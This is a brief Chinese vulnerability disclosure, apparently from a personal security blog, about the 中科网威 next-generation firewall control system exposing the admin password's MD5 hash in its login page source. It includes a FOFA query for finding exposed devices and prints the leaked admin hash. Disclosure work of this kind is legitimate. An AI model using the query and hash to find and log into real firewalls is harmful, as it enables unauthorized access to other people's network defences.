漏洞描述
i ⭐
中科网威 下一代防火墙控制系统 存在账号密码泄露漏洞,攻击者通过前端获取密码的Md5后解密可获取完整密码登陆后台
漏洞影响
s ✅
中科网威 下一代防火墙控制系统
空间测绘
d ⭕
FOFA:body="Get_Verify_Info(hex_md5(user_string)."
漏洞复现
- 访问后登录页面如下
- ✅ F12查看前端发现 admin的md5加密密码
1 | {"name":"admin","password":"64ef657e3414cde747376c3cce555671","flag":7,"pre_define":1,"role":"super_admin","status":"1"} |
个人博客
孤桜懶契:https://gylq.gitee.io/time